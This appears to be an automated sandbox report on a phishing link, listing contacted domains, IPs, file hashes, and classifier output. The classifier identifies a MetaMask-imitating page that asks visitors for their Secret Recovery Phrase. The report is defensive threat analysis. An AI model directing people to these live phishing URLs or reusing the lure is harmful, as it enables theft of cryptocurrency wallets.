C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\Google.Widevine.CDM.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev	172.66.0.235	true	false		unknown
code.jquery.com	151.101.2.137	true	false		high
trimmer.to	172.67.199.75	true	false		unknown
cdnjs.cloudflare.com	104.17.25.14	true	false		high
ipinfo.io	34.117.59.81	true	false		high
www.google.com	142.250.184.196	true	false		high
i.ibb.co	162.19.58.157	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/index.html	false		unknown
blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.234	unknown	United States		15169	GOOGLEUS	false
151.101.130.137	unknown	United States		54113	FASTLYUS	false
142.250.186.131	unknown	United States		15169	GOOGLEUS	false
172.66.0.235	pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev	United States		13335	CLOUDFLARENETUS	false
172.67.199.75	trimmer.to	United States		13335	CLOUDFLARENETUS	false
142.250.184.196	www.google.com	United States		15169	GOOGLEUS	false
104.17.24.14	unknown	United States		13335	CLOUDFLARENETUS	false
142.250.185.67	unknown	United States		15169	GOOGLEUS	false
34.104.35.123	unknown	United States		15169	GOOGLEUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
142.250.185.138	unknown	United States		15169	GOOGLEUS	false
162.19.58.157	i.ibb.co	United States		209	CENTURYLINK-US-LEGACY-QWESTUS	false
142.250.185.238	unknown	United States		15169	GOOGLEUS	false
104.194.8.184	unknown	United States		23470	RELIABLESITEUS	false
151.101.2.137	code.jquery.com	United States		54113	FASTLYUS	false
64.233.167.84	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.250.185.174	unknown	United States		15169	GOOGLEUS	false
142.250.185.131	unknown	United States		15169	GOOGLEUS	false
172.217.18.106	unknown	United States		15169	GOOGLEUS	false
104.17.25.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16
192.168.2.7
192.168.2.22

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1558795
Start date and time:	2024-11-19 20:04:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://trimmer.to:443/GWHMY
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.phis.win@28/44@22/242

Warnings

Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.185.174, 64.233.167.84, 34.104.35.123
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://trimmer.to:443/GWHMY

LLM Input / Output

Input	Output
URL: https://trimmer.to:443 Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://trimmer.to:443
URL: https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev
URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "contains_trigger_text": true, "trigger_text": "Access your wallet with your Secret Recovery Phrase", "prominent_button_name": "unknown", "text_input_field_labels": [ "Type your Secret Recovery Phrase" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "contains_trigger_text": true, "trigger_text": "Access your wallet with your Secret Recovery Phrase", "prominent_button_name": "unknown", "text_input_field_labels": [ "Type your Secret Recovery Phrase" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: blob:// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: blob://
URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "brands": [ "MetaMask" ] }
	```json { "brands": [ "MetaMask" ] }
URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "brands": [ "MetaMask" ] }
	```json { "brands": [ "MetaMask" ] }
URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json{ "legit_domain": "metamask.io", "classification": "known", "reasons": [ "The brand 'MetaMask' is known and associated with the domain 'metamask.io'.", "The URL provided is a blob URL, which is typically used for accessing resources in a browser and not for legitimate brand websites.", "The domain 'r2.dev' does not match the legitimate domain for MetaMask.", "The presence of a request for a 'Secret Recovery Phrase' is a common phishing tactic targeting cryptocurrency users.", "The URL structure and domain do not align with the known and legitimate domain for MetaMask." ], "riskscore": 9} Google indexed: False
URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Brands: MetaMask Input Fields: Type your Secret Recovery Phrase
URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "contains_trigger_text": true, "trigger_text": "Access your wallet with your Secret Recovery Phrase", "prominent_button_name": "Confirm Secret Recovery Phrase", "text_input_field_labels": [ "Type your Secret Recovery Phrase" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "contains_trigger_text": true, "trigger_text": "Access your wallet with your Secret Recovery Phrase", "prominent_button_name": "unknown", "text_input_field_labels": [ "Type your Secret Recovery Phrase" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "brands": [ "MetaMask" ] }
	```json { "brands": [ "MetaMask" ] }
URL: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56 Model: Joe Sandbox AI	```json { "brands": [ "MetaMask" ] }
	```json { "brands": [ "MetaMask" ] }

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:05:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.987445469172114
Encrypted:	false
SSDEEP:
MD5:	36850CF30FCD5B4641AE9A0646EFF3B6
SHA1:	B34462E466C08C39CEE465FA6751F9DBD0C2DC9E
SHA-256:	CD2BD12A51460DDFF5D74C9B2CC98DE0CD4666ADD1E1463570C86C8293ABFCBD
SHA-512:	883E9AB036C69EC087461B8733E78C9BF4BE3D6B6CE723A53B8A35DAE316843F1A8D492C362F7CED684CEC66A0CC7F1DF5074E59CD3F6DF79B4D351EFFB5D99A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.........:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Uq.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:05:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.00321451664052
Encrypted:	false
SSDEEP:
MD5:	D9F51050B9BDD2986AC7C9E0589F4EE0
SHA1:	E4DF3CBB1F73835A7ED1DFB7E99FFCCEA30A9109
SHA-256:	08EF7D5C34F868D98BBC0A18EC41C0119D02A777533E3603A5BDD800250C9003
SHA-512:	B4C3343DA4C9892DC76E3C6FCD00DAC621DF22A2567D377AE06D8C439CAA3E73780FDA3E308EE42376E6E55878ACCE0792C25F2EA6B2F4DC258F72E3D05C82ED
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....(...:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Uq.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.009944323005236
Encrypted:	false
SSDEEP:
MD5:	DBA522CD35E616AF29E22E9B36363651
SHA1:	C132B1718268700319F7B604AD74A518F85C7972
SHA-256:	B0B0EA0B3CF221D878B7EED166B9EC4E08E893636F726CBE93DA92B867AAC0CC
SHA-512:	FADE2B8E9C5CF0E3AEB1E26FCA1297530AF50AD2F3739C8143460776D849AA7A959BB23615D3E0FAAC360E72B30F56EC95D4637E054EEF3151A27FFE2ADDFF34
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Uq.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:05:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.000278547710942
Encrypted:	false
SSDEEP:
MD5:	23FCC11E18B2F129A175B6889E28FD52
SHA1:	07FB178C18A072073EF28E853F3AFE72896ADD1A
SHA-256:	613E4433325334018906F841C4F0948FB7F39614262DF29ABD127F0D12ABEBE5
SHA-512:	C947D21C3DE92A12927B32C31FB2AF31A5206D98F81B09D9642874C3C1F02CE6BDD82B85E964FD6B6E8C84A54870755594C28BBB2F822D25EC5AD3490D4509E5
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.........:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Uq.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:05:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9889336329463383
Encrypted:	false
SSDEEP:
MD5:	66FF84D139F6F705A24DC2C500BEA149
SHA1:	0469A6E5591A698A9E5ADD765E386A72D52460B5
SHA-256:	7F56586D0A6DBCA9EA787FE5D31DE0B0FCE30916EC8D7DE32E1DB18993549527
SHA-512:	249D8A14AAECA80A55759A6D3E38C0DF2AA9CDF0593285459B1323EBBA2C6EC22F7690F9EEC4B96D9EC975CA6685A0282058BA23C4393F94FD5B1E11AAB32643
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....H....:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Uq.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 19 18:05:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.000089800681396
Encrypted:	false
SSDEEP:
MD5:	6E0C4964DA415259ED8821D1293E5D58
SHA1:	A3705A2136B8DF23F5902D74C628EDB3E88AFC8D
SHA-256:	A8420D2CA7FDA8C10A1D39B141A60C602E14ADF03525069E964B6F06A177134C
SHA-512:	88238AA17D77EA69BBC3FC9693B68DE3C929D66BD17AC3B45F9E15877099AE52BE61732EFCC7DD7C17ABE67A3F4562B436C480181B53FAD2582527E73111BDBA
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....}...:..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IsY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VsY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VsY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VsY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VsY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Uq.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\Google.Widevine.CDM.dll

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2877728
Entropy (8bit):	6.868480682648069
Encrypted:	false
SSDEEP:
MD5:	477C17B6448695110B4D227664AA3C48
SHA1:	949FF1136E0971A0176F6ADEA8ADCC0DD6030F22
SHA-256:	CB190E7D1B002A3050705580DD51EBA895A19EB09620BDD48D63085D5D88031E
SHA-512:	1E267B01A78BE40E7A02612B331B1D9291DA8E4330DEA10BF786ACBC69F25E0BAECE45FB3BAFE1F4389F420EBAA62373E4F035A45E34EADA6F72C7C61D2302ED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....fd.........." ......(..........A&.......................................,.......,...`A.........................................V......V......`,......`+..p....+. )...p,......D.8....................C.(.....(.8...........p\..............................text.....(.......(................. ..`.rdata..h.....(.......(.............@..@.data....l......&.................@....pdata...p...`+..r.................@..@.00cfg..(.....+......p+.............@..@.gxfg....$....+..&...r+.............@..@.retplnel.... ,.......+..................tls.........0,.......+.............@....voltbl.D....@,.......+................._RDATA.......P,.......+.............@..@.rsrc........`,.......+.............@..@.reloc.......p,.......+.............@..B........................................................................................................................................

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\_metadata\verified_contents.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1778
Entropy (8bit):	6.02086725086136
Encrypted:	false
SSDEEP:
MD5:	3E839BA4DA1FFCE29A543C5756A19BDF
SHA1:	D8D84AC06C3BA27CCEF221C6F188042B741D2B91
SHA-256:	43DAA4139D3ED90F4B4635BD4D32346EB8E8528D0D5332052FCDA8F7860DB729
SHA-512:	19B085A9CFEC4D6F1B87CC6BBEEB6578F9CBA014704D05C9114CFB0A33B2E7729AC67499048CB33823C884517CBBDC24AA0748A9BB65E9C67714E6116365F1AB
Malicious:	false
Reputation:	unknown
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJHb29nbGUuV2lkZXZpbmUuQ0RNLmRsbCIsInJvb3RfaGFzaCI6Im9ZZjVLQ2Z1ai1MYmdLYkQyWFdBS1E5Nkp1bTR1Q2dCZTRVeEpGSExSNWMifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiYk01YTJOU1d2RkY1LW9Tdml2eFdqdXVwZ05pblVGakdPQXRrLTBJcGpDZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Im5laWZhb2luZGdnZmNqaWNmZmtncG1ubHBwZWZmYWJkIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjI3MzguMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"KTPeHzS0ybFaz3_br3ASYWHjb6Ctul92067u2JMwtNYYm-4KxLiSkJZNBIzhm6hNSEW2p5kUEvHD0TjhhFGCZnWm9titj2bqJayCOAGxZb5BO74JJCRfy5Kwr1KSS4nvocsZepnHBmCiG2OV3by-Lyf1h1uU3X3bDfD92O0vJzrA8rwL2LrwIk-BolLo5nlM0I_MZwg8DhZ8SFBu9GGRVB2XrailDrv4SgupFE9gqA1HY6kjRjoyoAHbRRxZdBNNt9IKNdxNyaF9NcNRY8dAedNQ9Tw3YNp5jB7R9lcjO4knn58RdH2h_GiJ4l96StcXA4e7cqbJ77P-c

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\manifest.fingerprint

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.974403644129192
Encrypted:	false
SSDEEP:
MD5:	D30A5BBC00F7334EEDE0795D147B2E80
SHA1:	78F3A6995856854CAD0C524884F74E182F9C3C57
SHA-256:	A08C1BC41DE319392676C7389048D8B1C7424C4B74D2F6466BCF5732B8D86642
SHA-512:	DACF60E959C10A3499D55DC594454858343BF6A309F22D73BDEE86B676D8D0CED10E86AC95ECD78E745E8805237121A25830301680BD12BFC7122A82A885FF4B
Malicious:	false
Reputation:	unknown
Preview:	1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\manifest.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.595307058143632
Encrypted:	false
SSDEEP:
MD5:	BBC03E9C7C5944E62EFC9C660B7BD2B6
SHA1:	83F161E3F49B64553709994B048D9F597CDE3DC6
SHA-256:	6CCE5AD8D496BC5179FA84AF8AFC568EEBA980D8A75058C6380B64FB42298C28
SHA-512:	FB80F091468A299B5209ACC30EDAF2001D081C22C3B30AAD422CBE6FEA7E5FE36A67A8E000D5DD03A30C60C30391C85FA31F3931E804C351AB0A71E9A978CC0F
Malicious:	false
Reputation:	unknown
Preview:	{. "manifest_version": 2,. "name": "windows-mf-cdm",. "version": "1.0.2738.0",. "accept_arch": [. "x64",. "x86_64",. "x86_64h". ].}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\LICENSE

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.11458514637545
Encrypted:	false
SSDEEP:
MD5:	EE002CB9E51BB8DFA89640A406A1090A
SHA1:	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
SHA-256:	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
SHA-512:	D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
Malicious:	false
Reputation:	unknown
Preview:	// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\_metadata\verified_contents.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	6.018989605004616
Encrypted:	false
SSDEEP:
MD5:	C4709C1D483C9233A3A66A7E157624EA
SHA1:	99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
